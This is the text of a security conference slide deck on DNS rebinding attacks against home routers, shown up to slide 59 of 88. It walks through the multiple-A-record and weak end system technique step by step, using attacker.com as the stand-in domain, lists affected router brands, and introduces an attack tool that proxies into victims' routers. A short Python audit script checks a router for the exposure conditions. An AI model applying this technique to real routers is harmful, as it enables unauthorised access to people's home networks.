DEFCON 18 Heffner Routers

  • 8/9/2019 DEFCON 18 Heffner Routers

    1/88

    How to Hack Millions of Routers

    Craig Heffner, Seismic LLC

    2/88

    SOHO Router Security?

    3/88

    Common Attack Techniques

    Cross Site Request Forgery

    No trust relationship between browser and router

    Can't forge Basic Authentication credentials

    Anti-CSRF

    Limited by the same origin policy

    DNS Rebinding

    Rebinding prevention by OpenDNS / NoScript / DNSWall

    Most rebinding attacks no longer work Most

    4/88

    Multiple A Record Attack

    Better known as DNS load balancing / redundancy

    Return multiple IP addresses in DNS response

    Browser attempts to connect to each IP address in order

    If one IP goes down, browser switches to the next IP in the list

    Limited attack

    Can rebind to any public IP address

    Can't rebind to an RFC1918 IP address

    5/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    Target IP: 2.3.5.8
    Attacker IP: 1.4.1.4
    Attacker Domain: attacker.com

    6/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    What is the IP address for attacker.com?

    7/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    1.4.1.4
    2.3.5.8

    8/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    GET / HTTP/1.1
    Host: attacker.com

    9/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    10/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    GET / HTTP/1.1
    Host: attacker.com

    11/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    TCP RST

    12/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    GET / HTTP/1.1
    Host: attacker.com

    13/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    14/88

    Rebinding to a Private IP

    1.4.1.4

    Target IP: 192.168.1.1
    Attacker IP: 1.4.1.4
    Attacker Domain: attacker.com

    192.168.1.1

    15/88

    Rebinding to a Private IP

    1.4.1.4

    What is the IP address for attacker.com?

    192.168.1.1

    16/88

    Rebinding to a Private IP

    1.4.1.4

    1.4.1.4
    192.168.1.1

    192.168.1.1

    17/88

    Rebinding to a Private IP

    1.4.1.4

    GET / HTTP/1.1
    Host: attacker.com

    192.168.1.1

    18/88

    Rebinding to a Private IP

    1.4.1.4

    192.168.1.1

    19/88

    Services Bound to All Interfaces

    # netstat -l
    Active Internet connections (only servers)
    Proto Recv-Q Send-Q Local Address   Foreign Address   State
    tcp   0      0      *:80            *:*               LISTEN
    tcp   0      0      *:53            *:*               LISTEN
    tcp   0      0      *:22            *:*               LISTEN
    tcp   0      0      *:23            *:*               LISTEN

    20/88

    Firewall Rules Based on Interface Names

    -A INPUT -i eth0 -j DROP
    -A INPUT -j ACCEPT

    21/88

    IP Stack Implementations

    RFC 1122 defines two IP models:

    Strong End System Model

    Weak End System Model

    22/88

    The Weak End System Model

    RFC 1122, Weak End System Model:

    A host MAY silently discard an incoming datagram whose destination address does not correspond to the physical interface through which it is received.

    A host MAY restrict itself to sending (non-source-routed) IP datagrams only through the physical interface that corresponds to the IP source address of the datagrams.

    23/88

    Weak End System Model

    eth1 192.168.1.1

    eth0 2.3.5.8

    24/88

    Weak End System Model

    TCP SYN Packet
    Source IP: 192.168.1.100
    Destination IP: 2.3.5.8
    Destination Port: 80

    eth1 192.168.1.1

    eth0 2.3.5.8

    25/88

    Weak End System Model

    TCP SYN/ACK Packet
    Source IP: 2.3.5.8
    Destination IP: 192.168.1.100
    Source Port: 80

    eth1 192.168.1.1

    eth0 2.3.5.8

    26/88

    Weak End System Model

    TCP ACK Packet
    Source IP: 192.168.1.100
    Destination IP: 2.3.5.8
    Destination Port: 80

    eth1 192.168.1.1

    eth0 2.3.5.8

    27/88

    Traffic Capture

    28/88

    End Result

    29/88

    Public IP Rebinding Attack

    1.4.1.4

    Target IP: 2.3.5.8
    Attacker IP: 1.4.1.4
    Attacker Domain: attacker.com

    2.3.5.8

    30/88

    Public IP Rebinding Attack

    1.4.1.4

    What is the IP address for attacker.com?

    2.3.5.8

    31/88

    Public IP Rebinding Attack

    1.4.1.4

    1.4.1.4
    2.3.5.8

    2.3.5.8

    32/88

    Public IP Rebinding Attack

    1.4.1.4

    GET / HTTP/1.1
    Host: attacker.com

    2.3.5.8

    33/88

    Public IP Rebinding Attack

    1.4.1.4

    ...

    2.3.5.8

    34/88

    Public IP Rebinding Attack

    1.4.1.4

    GET / HTTP/1.1
    Host: attacker.com

    2.3.5.8

    35/88

    Public IP Rebinding Attack

    1.4.1.4

    TCP RST

    2.3.5.8

    36/88

    Public IP Rebinding Attack

    1.4.1.4

    GET / HTTP/1.1
    Host: attacker.com

    2.3.5.8

    37/88

    Public IP Rebinding Attack

    1.4.1.4

    2.3.5.8

    38/88

    Public IP Rebinding Attack

    Pros:

    Nearly instant rebind, no delay or waiting period

    Don't need to know router's internal IP

    Works in all major browsers: IE, FF, Opera, Safari, Chrome

    Cons:

    Router must meet very specific conditions

    Must bind Web server to the WAN interface

    Firewall rules must be based on interface names, not IP addresses

    Must implement the weak end system model

    Not all routers are vulnerable
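An audit sketch for the first two conditions above, written for this page as an added example (it is not from the talk or from the Rebind tool). The netstat lines and rule sets are constructed samples modelled on the slides, `eth1` as the LAN interface follows the earlier diagram, and `IP_RULES` is an assumed address-based variant; the weak end system model itself is not tested here.

```python
import shlex

# Constructed sample data modelled on the slides; not captured from a device.
NETSTAT = """\
tcp 0 0 *:80 *:* LISTEN
tcp 0 0 *:53 *:* LISTEN
tcp 0 0 192.168.1.1:22 *:* LISTEN
"""
WEAK_RULES = ["-A INPUT -i eth0 -j DROP", "-A INPUT -j ACCEPT"]
# Assumed hardened variant: match on the WAN address, not only the interface.
IP_RULES = ["-A INPUT -d 2.3.5.8 -j DROP"] + WEAK_RULES

def wildcard_listeners(netstat_text):
    """Ports of listening sockets bound to every interface (numeric output)."""
    ports = []
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) >= 6 and f[-1] == "LISTEN":
            addr, _, port = f[3].rpartition(":")
            if addr in ("*", "0.0.0.0", "::"):
                ports.append(int(port))
    return ports

def parse_rule(rule):
    """Parse the small subset of iptables syntax used above."""
    tok = shlex.split(rule)
    opts = dict(zip(tok[2::2], tok[3::2]))  # flag/value pairs after "-A INPUT"
    return {"in": opts.get("-i"), "dst": opts.get("-d"), "target": opts["-j"]}

def verdict(rules, in_iface, dst, policy="ACCEPT"):
    """First matching rule wins, as in a netfilter chain."""
    for r in map(parse_rule, rules):
        if r["in"] not in (None, in_iface):
            continue
        if r["dst"] not in (None, dst):
            continue
        return r["target"]
    return policy

def exposed(rules, netstat_text, wan_ip, lan_iface="eth1"):
    """Ports a LAN host reaches when it addresses the router's WAN IP."""
    if verdict(rules, lan_iface, wan_ip) != "ACCEPT":
        return []
    return wildcard_listeners(netstat_text)

if __name__ == "__main__":
    print("WAN-side packet:", verdict(WEAK_RULES, "eth0", "2.3.5.8"))
    print("interface-name rules expose:", exposed(WEAK_RULES, NETSTAT, "2.3.5.8"))
    print("address-based rules expose:", exposed(IP_RULES, NETSTAT, "2.3.5.8"))
```

With the address-based rule set, a LAN client can still reach the router on 192.168.1.1, so local administration is unaffected.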

    39/88

    Affected Routers

    40/88

    Asus

    41/88

    Belkin

    42/88

    Dell

    43/88

    Thompson

    44/88

    Linksys

    45/88

    Third Party Firmware

    46/88

    ActionTec

    47/88

    Making the Attack Practical

    To make the attack practical:

    Must obtain target's public IP address automatically

    Must coordinate services (DNS, Web, Firewall)

    Must do something useful

    48/88

    Tool Release: Rebind

    Provides all necessary services

    DNS, Web, Firewall

    Serves up JavaScript code

    Limits foreground activity

    Makes use of cross-domain XHR, if supported

    Supports all major Web browsers

    Attacker can browse target routers in real-time

    Via a standard HTTP proxy

    49/88

    Rebind

    2.3.5.8 1.4.1.4

    Target IP: 2.3.5.8
    Rebind IP: 1.4.1.4
    Attacker Domain: attacker.com

    50/88

    Rebind

    51/88

    Rebind

    52/88

    Rebind

    2.3.5.8 1.4.1.4

    What is the IP address for attacker.com?

    53/88

    Rebind

    2.3.5.8 1.4.1.4

    1.4.1.4

    54/88

    Rebind

    2.3.5.8 1.4.1.4

    GET /init HTTP/1.1
    Host: attacker.com

    55/88

    Rebind

    2.3.5.8 1.4.1.4

    Location: http://wacme.attacker.com/exec

    56/88

    Rebind

    2.3.5.8 1.4.1.4

    What is the IP address for wacme.attacker.com?

    57/88

    Rebind

    2.3.5.8 1.4.1.4

    1.4.1.4
    2.3.5.8

    58/88

    Rebind

    2.3.5.8 1.4.1.4

    GET /exec HTTP/1.1
    Host: wacme.attacker.com

    59/88

    Rebind

    2.3.5.8 1.4.1.4